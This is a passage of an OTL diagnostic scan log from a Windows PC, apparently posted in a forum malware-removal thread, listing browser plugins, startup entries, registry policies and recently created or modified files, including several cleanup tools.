FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/GoogleTalkPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/O1DPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
O1 HOSTS File: ([2014/11/08 13:01:05 | 000,000,035 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (CIESpeechBHO Class) - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [AthBtTray] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Atheros Commnucations)
O4:64bit: - HKLM..\Run: [AtherosBtStack] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations)
O4:64bit: - HKLM..\Run: [CDAServer] C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe ()
O4:64bit: - HKLM..\Run: [FspUip] C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe (Sentelic Corporation)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [SRS Premium Sound HD] C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe (SRS Labs, Inc.)
O4 - HKLM..\Run: [Adobe Reader Speed Launcher] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [OSD Utility] C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe (VIZIO Computer Inc.)
O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation)
O4 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001..\Run: [ANT Agent] C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe (GARMIN Corp.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - Reg Error: Key error. File not found
O9 - Extra 'Tools' menuitem : Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000010 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000010 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab (Reg Error: Key error.)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.200.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883}: DhcpNameServer = 10.14.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D75AA527-005C-4D5C-8F2A-E2A78107EAEF}: DhcpNameServer = 192.168.200.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O20:64bit: - AppInit_DLLs: (C:\Windows\System32\nvinitx.dll) - C:\Windows\SysNative\nvinitx.dll (NVIDIA Corporation)
O20 - AppInit_DLLs: (C:\Windows\SysWOW64\nvinit.dll) - C:\Windows\SysWOW64\nvinit.dll (NVIDIA Corporation)
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = ComFile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
========== Files/Folders - Created Within 30 Days ==========
[2014/11/08 20:57:50 | 000,000,000 | R--D | C] -- C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
[2014/11/08 17:30:12 | 000,000,000 | ---D | C] -- C:\Users\Ryan\AppData\Local\{8491446D-F948-4B19-B521-2509828BF009}
[2014/11/08 14:48:11 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Ryan\Desktop\OTL.exe
[2014/11/08 13:00:58 | 000,000,000 | ---D | C] -- C:\Users\Ryan\Desktop\FRST-OlderVersion
[2014/11/07 18:24:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/11/07 18:22:56 | 000,000,000 | ---D | C] -- C:\Users\Ryan\Desktop\mbar
[2014/11/07 18:13:16 | 014,439,144 | ---- | C] (Malwarebytes Corp.) -- C:\Users\Ryan\Desktop\mbar-1.08.0.1001.exe
[2014/11/07 15:57:55 | 000,186,568 | ---- | C] (ESET) -- C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
[2014/11/07 15:57:05 | 004,184,008 | ---- | C] (Kaspersky Lab ZAO) -- C:\Users\Ryan\Desktop\tdsskiller.exe
[2014/11/03 20:24:59 | 000,000,000 | ---D | C] -- C:\Users\Ryan\AppData\Local\{9B1BF085-634B-426D-BDB3-489C0053B60E}
[2014/11/03 18:26:34 | 001,706,359 | ---- | C] (Thisisu) -- C:\Users\Ryan\Desktop\JRT.exe
[2014/11/03 18:20:57 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/11/03 18:14:25 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2014/11/03 15:20:29 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2014/11/03 15:20:27 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2014/11/03 15:11:20 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2014/11/03 15:11:20 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2014/11/03 15:11:20 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2014/11/03 15:09:31 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/11/03 15:09:15 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2014/11/03 15:08:40 | 005,591,672 | R--- | C] (Swearware) -- C:\Users\Ryan\Desktop\ComboFix.exe
[2014/11/02 22:25:00 | 005,192,704 | ---- | C] (AVAST Software) -- C:\Users\Ryan\Desktop\aswMBR.exe
[2014/11/02 22:18:14 | 000,000,000 | ---D | C] -- C:\FRST
[2014/11/02 22:17:28 | 002,115,584 | ---- | C] (Farbar) -- C:\Users\Ryan\Desktop\FRST64.exe
[2014/10/30 20:53:23 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/10/30 00:28:49 | 000,000,000 | ---D | C] -- C:\RegBackup
[2014/10/30 00:27:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
[2014/10/30 00:27:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Tweaking.com
[2014/10/29 18:45:59 | 000,000,000 | ---D | C] -- C:\Users\Ryan\AppData\Roaming\Mozilla
[2014/10/15 15:38:39 | 000,272,808 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/10/15 15:38:34 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/10/15 15:38:34 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/10/15 15:38:34 | 000,098,216 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/10/15 15:38:34 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/10/15 15:38:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Java
[2014/10/14 19:39:38 | 000,000,000 | ---D | C] -- C:\Users\Ryan\Desktop\masque of red death
[2014/10/14 15:21:20 | 001,943,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dfshim.dll
[2014/10/14 15:21:20 | 001,131,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dfshim.dll
[2014/10/14 15:21:20 | 000,156,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscorier.dll
[2014/10/14 15:21:20 | 000,156,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscorier.dll
[2014/10/14 15:21:20 | 000,073,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscories.dll
[2014/10/14 15:21:19 | 000,081,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscories.dll
[2014/10/14 15:21:05 | 005,552,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2014/10/14 15:21:05 | 001,202,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmv2clt.dll
[2014/10/14 15:21:05 | 000,988,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmv2clt.dll
[2014/10/14 15:21:05 | 000,842,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\blackbox.dll
[2014/10/14 15:21:05 | 000,744,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\blackbox.dll
[2014/10/14 15:21:04 | 014,632,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmp.dll
[2014/10/14 15:21:03 | 004,120,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mf.dll
[2014/10/14 15:21:02 | 000,782,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmdrmsdk.dll
[2014/10/14 15:21:02 | 000,617,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmdrmsdk.dll
[2014/10/14 15:21:01 | 003,919,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2014/10/14 15:21:00 | 003,975,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2014/10/14 15:21:00 | 000,500,224 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AUDIOKSE.dll
[2014/10/14 15:20:57 | 011,411,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmp.dll
[2014/10/14 15:20:54 | 003,208,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mf.dll
[2014/10/14 15:20:54 | 000,693,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.efi
[2014/10/14 15:20:54 | 000,617,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.efi
[2014/10/14 15:20:54 | 000,497,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmmgrtn.dll
[2014/10/14 15:20:54 | 000,457,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ci.dll
[2014/10/14 15:20:54 | 000,442,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\AUDIOKSE.dll
[2014/10/14 15:20:54 | 000,406,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmmgrtn.dll
[2014/10/14 15:20:53 | 001,574,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\quartz.dll
[2014/10/14 15:20:53 | 000,619,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.exe
[2014/10/14 15:20:53 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioEng.dll
[2014/10/14 15:20:52 | 000,533,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.exe
[2014/10/14 15:20:51 | 000,229,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll
[2014/10/14 15:20:50 | 000,631,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\evr.dll
[2014/10/14 15:20:48 | 001,480,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll
[2014/10/14 15:20:48 | 000,284,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\EncDump.dll
[2014/10/14 15:20:47 | 001,069,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptui.dll
[2014/10/14 15:20:47 | 000,489,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\evr.dll
[2014/10/14 15:20:47 | 000,296,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioSes.dll
[2014/10/14 15:20:46 | 001,329,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\quartz.dll
[2014/10/14 15:20:46 | 000,432,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfplat.dll
[2014/10/14 15:20:45 | 001,005,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cryptui.dll
[2014/10/14 15:20:45 | 000,641,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msscp.dll
[2014/10/14 15:20:45 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll
[2014/10/14 15:20:45 | 000,354,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfplat.dll
[2014/10/14 15:20:45 | 000,082,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptsp.dll
[2014/10/14 15:20:44 | 000,504,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msscp.dll
[2014/10/14 15:20:44 | 000,325,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msnetobj.dll
[2014/10/14 15:20:44 | 000,126,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\audiodg.exe
[2014/10/14 15:20:44 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidapi.dll
[2014/10/14 15:20:43 | 000,265,216 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msnetobj.dll
[2014/10/14 15:20:43 | 000,206,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfps.dll
[2014/10/14 15:20:43 | 000,103,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfps.dll
[2014/10/14 15:20:43 | 000,055,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rrinstaller.exe
[2014/10/14 15:20:43 | 000,050,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\appidapi.dll
[2014/10/14 15:20:43 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rrinstaller.exe
[2014/10/14 15:20:42 | 000,063,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\setbcdlocale.dll
[2014/10/14 15:20:42 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfpmp.exe
[2014/10/14 15:20:41 | 012,625,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmploc.DLL
[2014/10/14 15:20:41 | 012,625,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmploc.DLL
[2014/10/14 15:20:41 | 000,023,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfpmp.exe
[2014/10/14 15:20:41 | 000,009,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\spwmp.dll
[2014/10/14 15:20:41 | 000,008,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\spwmp.dll
[2014/10/14 15:20:41 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msdxm.ocx
[2014/10/14 15:20:41 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxmasf.dll
[2014/10/14 15:20:41 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msdxm.ocx
[2014/10/14 15:20:41 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dxmasf.dll
[2014/10/14 15:20:41 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mferror.dll
[2014/10/14 15:20:41 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mferror.dll
[2014/10/14 15:20:34 | 000,276,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/14 15:20:31 | 000,507,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/10/14 15:20:29 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/10/14 15:20:29 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/10/14 15:20:29 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/10/14 15:20:29 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/10/14 15:20:29 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/10/14 15:20:28 | 000,710,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/10/14 15:20:28 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/10/14 15:20:26 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/10/14 15:20:26 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/10/14 15:20:21 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/10/14 15:20:14 | 002,017,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/10/14 15:20:14 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/10/14 15:20:14 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/10/14 15:20:12 | 000,731,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/10/14 15:20:12 | 000,446,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/10/14 15:20:12 | 000,440,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/10/14 15:20:12 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/10/14 15:20:11 | 002,108,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/10/14 15:20:11 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/10/14 15:20:08 | 001,068,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/10/14 15:19:59 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/10/14 15:19:54 | 000,678,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/10/14 15:19:48 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/10/14 15:19:48 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/10/14 15:19:40 | 000,289,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/10/14 15:19:38 | 000,595,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/10/14 15:19:29 | 001,249,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/10/14 15:19:29 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/10/14 15:19:27 | 005,829,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/10/14 15:19:27 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/10/14 15:19:27 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/10/14 15:19:25 | 000,547,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/10/14 15:19:22 | 000,775,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/10/14 15:19:19 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/10/14 15:19:16 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/10/14 15:19:09 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/10/14 15:18:43 | 003,241,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msi.dll
[2014/10/14 15:17:58 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rastls.dll
[2014/10/14 15:17:58 | 000,372,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rastls.dll
[2014/10/14 15:17:56 | 003,722,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstscax.dll
[2014/10/14 15:17:56 | 003,221,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstscax.dll
[2014/10/14 15:17:55 | 001,118,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstsc.exe
[2014/10/14 15:17:55 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstsc.exe
[2014/10/14 15:17:55 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsta.dll
[2014/10/14 15:17:55 | 000,150,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpcorekmts.dll
[2014/10/14 15:17:54 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/10/14 15:17:54 | 000,131,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\aaclient.dll
[2014/10/14 15:17:47 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\packager.dll
[2014/10/14 15:17:47 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\packager.dll
ascot1340
2014-11-09, 22:53
========== Files - Modified Within 30 Days ==========
[2014/11/08 20:57:42 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/11/08 20:39:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/11/08 20:36:00 | 000,000,904 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
[2014/11/08 17:36:00 | 000,000,852 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
[2014/11/08 14:48:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ryan\Desktop\OTL.exe
[2014/11/08 13:09:54 | 000,027,744 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/11/08 13:09:54 | 000,027,744 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
